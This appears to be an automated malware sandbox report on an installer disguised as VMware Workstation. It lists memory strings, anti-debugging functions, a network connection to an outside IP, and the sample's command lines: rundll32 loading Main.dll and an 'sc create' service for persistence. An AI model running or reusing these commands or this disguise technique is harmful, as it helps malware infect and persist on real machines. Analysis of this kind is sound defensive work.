          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSPurge
          Source: FilePost?a.exe.2.drBinary or memory string: 17.0.0 build-20800274VMware Workstation%s Authentication Daemon Version %u.%u for %s %s
          Source: FilePost?a.exe.2.drBinary or memory string: noreply@vmware.com0
          Source: FilePost?a.exe.2.drBinary or memory string: vmware
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_VMCISetFiltering
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSPurge
          Source: Squirrel-Install.log.2.drBinary or memory string: [07/03/24 10:36:00] info: ApplyReleasesImpl: About to save shortcut: C:\Users\user\Desktop\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_QueryHGFS
          Source: PostWallet-1.0.0-full.nupkgBinary or memory string: lib/net48/vmwarebase.dll
          Source: FilePost?a.exe.2.drBinary or memory string: VMware Authorization Service
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetWriteAccess
          Source: Squirrel-Install.log.2.drBinary or memory string: [07/03/24 10:36:00] info: ApplyReleasesImpl: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: FilePost?a.exe.2.drBinary or memory string: Authorization and authentication service for starting and accessing virtual machinesVMware Authorization ServiceVMAuthdServiceSuccessfully registered %s.
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: FilePost?a.exe.2.drBinary or memory string: 599 vmware-authd PANIC: %s
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetHostDefaultCase
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: a.exe => C:\Users\user\Desktop\VMware Workstation.lnk2y
          Source: FilePost?a.exe.2.drBinary or memory string: vmware-hostd
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetFollowSymlinks
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetHostPath
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Workstationp^y
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineQueryShared_HGFS
          Source: FilePost?a.exe.2.drBinary or memory string: vmware-vmx-debug.exe
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware-authd.exep^y
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: gC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnk
          Source: FilePost?a.exe.2.drBinary or memory string: File_CreateDirectoryvmwarebase.DLL)_strdup
          Source: Squirrel-Install.log.2.drBinary or memory string: a.exe => C:\Users\user\Desktop\VMware Workstation.lnk
          Source: FilePost?a.exe.2.drBinary or memory string: security.host.ruisslvmwareauthd.policy.allowRCForReadvmauthd.startupTimeoutgetpeername failed: %d tid %d
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetFiltering
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetPresent
          Source: Update.exe, 00000002.00000002.1680892254.000000000283A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.dll@
          Source: FilePost?a.exe.2.drBinary or memory string: \\.\pipe\vmware-authdpipeCreateNamedPipe failed: %s (%d)
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetEnabled
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.
          Source: Update.exe, 00000002.00000002.1683760464.000000001B4C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.J
          Source: FilePost?a.exe.2.drBinary or memory string: vmware-vmx.exe
          Source: FilePost?a.exe, 00000007.00000002.4089346072.00000000031AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.DLL
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetHostDefaultCase
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetReadAccess
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ApplyReleasesImpl: About to save shortcut: C:\Users\user\Desktop\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: FilePost?a.exe.2.drBinary or memory string: VMware
          Source: Main.dll.7.drBinary or memory string: \VMware Workstation.lnk
          Source: FilePost?a.exe.2.drBinary or memory string: <description>"VMware Authorization Service"</description>
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetGuestName
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: About to save shortcut: C:\Users\user\Desktop\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: FilePost?a.exe.2.drBinary or memory string: vmware-vmx.exe%s%c..%c%svmware-vmx-debug.exevmware-vmx-stats.exeNo ticket found
          Source: FilePost?a.exe.2.drBinary or memory string: VMware, Inc.1!0
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineQueryShared_VMCI
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: W32Util_GetVMwareGroupSid
          Source: rundll32.exe, 0000000C.00000002.4091911884.000001A76A92C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.4091911884.000001A76A901000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.4091911884.000001A76A97E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: FilePost?a.exe.2.drBinary or memory string: VMware, Inc.1
          Source: rundll32.exe, 0000000C.00000002.4093722104.000001A76AA94000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -C:\Users\user\Desktop\VMware Workstation.lnk
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CCan't write shortcut: C:\Users\user\Desktop\VMware Workstation.lnkx.}
          Source: FilePost?a.exe.2.drBinary or memory string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb--
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: a.exe => C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk2y
          Source: Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /lib/net48/vmwarebase.dll
          Source: FilePost?a.exe.2.drBinary or memory string: vmwarebase.DLL
          Source: FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: HgfsEscape_GetSize
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetExpiration
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk
          Source: Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /LIB/NET48/VMWAREBASE.DLL
          Source: Update.exe, 00000002.00000002.1683760464.000000001B4C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .VMware, Inc.
          Source: FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: HgfsEscape_Do
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetReadAccess
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.p^y
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ~Can't write shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnkx.}
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: AsyncSocket_ListenVMCI
          Source: FilePost?a.exe.2.drBinary or memory string: VMware Server Console
          Source: Update.exe, 00000002.00000002.1683760464.000000001B4C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\VMware Workstation.lnkc.
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.dll
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: AsyncSocket_ConnectVMCI
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: gC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnkx.}
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwarebase.dll
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetEnabled
          Source: FilePost?a.exe.2.drBinary or memory string: VMware Workstation
          Source: Update.exe, 00000002.00000002.1680892254.000000000291A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lib/net48/vmwarebase.dll0y
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetPresent
          Source: FilePost?a.exe.2.drBinary or memory string: OriginalFilenamevmware-authd.exeF
          Source: FilePost?a.exe.2.drBinary or memory string: : SSL RequiredNFCSSL supported/tServerDaemonProtocol:SOAPVMware%s Authentication Daemon Version %u.%u%s, %s, %s, %s, %s, %s%sError retrieving thumbprintInvalid arguments to '%s%s'Login failed: token key authentication not allowed.GET TOKEN KEY failed: got %s
          Source: Update.exe, 00000002.00000002.1680377944.0000000000A19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnknkI
          Source: Update.exe, 00000002.00000002.1683760464.000000001B4C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -C:\Users\user\Desktop\VMware Workstation.lnkx.}
          Source: FilePost?a.exeBinary or memory string: 599 vmware-authd PANIC: %s
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Authorization Servicep^y
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetHostPath
          Source: FilePost?a.exe.2.drBinary or memory string: http://www.vmware.com/0/
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetFollowSymlinks
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetID
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, IncX
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetUnrestricted
          Source: FilePost?a.exe.2.drBinary or memory string: nfcnfcsslvmware-hostdPROXY service %s not found.USER too long.Password required for %s.Login with USER first.InSeCuRePassword not understood.User %s logged in.LOGIN FAILURE from %.128s, %s
          Source: FilePost?a.exe.2.drBinary or memory string: ProductNameVMware WorkstationP
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineQuery_HGFS
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lib\net48\vmwarebase.dll
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1998-2022 VMware, Inc.p^y
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ApplyReleasesImpl: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: FilePost?a.exe.2.drBinary or memory string: FileDescriptionVMware Authorization ServiceL
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetGuestName
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_QueryVMCI
          Source: FilePost?a.exe.2.drBinary or memory string: 1998-2022 VMware, Inc.J
          Source: FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: HgfsEscape_Undo
          Source: Update.exe, 00000002.00000002.1680892254.000000000283A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWa
          Source: FilePost?a.exe.2.drBinary or memory string: vmware-vmx-stats.exe
          Source: Squirrel-Install.log.2.drBinary or memory string: a.exe => C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetTags
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetPciSlotNumber
          Source: FilePost?a.exe.2.drBinary or memory string: User not authorized for vpx agent contactvmware-vpxaUser not authorized for vmx contactConnecting socket=%s
          Source: Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0http://defaultcontainer/lib/net48/vmwarebase.dll
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetExpiration
          Source: FilePost?a.exe.2.drBinary or memory string: Invalid pathname (too long)Config file not found: %sVMware Server ConsoleYou need read access in order to connect with the %s. Access denied for config file: %sYou need execute access in order to connect with the %s. Access denied for config file: %s%s-fdConnect %sError connecting to %s service instance.Can't create mutex '%s' (%d)Timeout acquiring thread lock.-fdCould not open %s process %d. (error %d)Error connecting to vmx process.No such %s process: %s
          Source: FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: W32Util_GetVmwareCommonAppDataFilePath
          Source: Update.exe, 00000002.00000002.1680892254.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetPresent
          Source: Update.exe, 00000002.00000002.1680892254.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc
          Source: FilePost?a.exe.2.drBinary or memory string: vmware-vpxa
          Source: FilePost?a.exe.2.drBinary or memory string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00348F80 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00348F80
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D1837F3 mov eax, dword ptr fs:[00000030h]3_2_6D1837F3
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D179141 mov eax, dword ptr fs:[00000030h]3_2_6D179141
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D18494E GetProcessHeap,3_2_6D18494E
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_003490E3 SetUnhandledExceptionFilter,3_2_003490E3
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_003484CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_003484CB
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00348F80 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00348F80
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D16855E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6D16855E
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D17300E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6D17300E
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D168334 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6D168334
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6E39F81F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6E39F81F
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\System32\rundll32.exeNetwork Connect: 16.12.1.14 443Jump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D144A50 ShellExecuteExW,WaitForSingleObject,CloseHandle,GetClassNameW,lstrcmpW,ShowWindow,3_2_6D144A50
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" --squirrel-firstrunJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMainJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMainJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= autoJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= autoJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00344850 AllocateAndInitializeSid,calloc,InitializeAcl,GetLastError,Warning,AddAccessAllowedAce,GetLastError,Warning,IsValidAcl,GetLastError,Warning,LocalAlloc,InitializeSecurityDescriptor,GetLastError,Warning,SetSecurityDescriptorDacl,GetLastError,Warning,IsValidSecurityDescriptor,GetLastError,Warning,CreateNamedPipeW,GetLastError,Warning,CreateEventW,GetLastError,Warning,FreeSid,free,LocalFree,CloseHandle,CloseHandle,ConnectNamedPipe,GetLastError,GetLastError,Warning,FreeSid,free,LocalFree,3_2_00344850
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_00344850 AllocateAndInitializeSid,calloc,InitializeAcl,GetLastError,Warning,AddAccessAllowedAce,GetLastError,Warning,IsValidAcl,GetLastError,Warning,LocalAlloc,InitializeSecurityDescriptor,GetLastError,Warning,SetSecurityDescriptorDacl,GetLastError,Warning,IsValidSecurityDescriptor,GetLastError,Warning,CreateNamedPipeW,GetLastError,Warning,CreateEventW,GetLastError,Warning,FreeSid,free,LocalFree,CloseHandle,CloseHandle,ConnectNamedPipe,GetLastError,GetLastError,Warning,FreeSid,free,LocalFree,3_2_00344850
          Source: ClassicIE_64.dll.12.drBinary or memory string: bn2.txtShell_TrayWnd
          Source: ClassicIE_64.dll.12.drBinary or memory string: ;Shell_TrayWndH
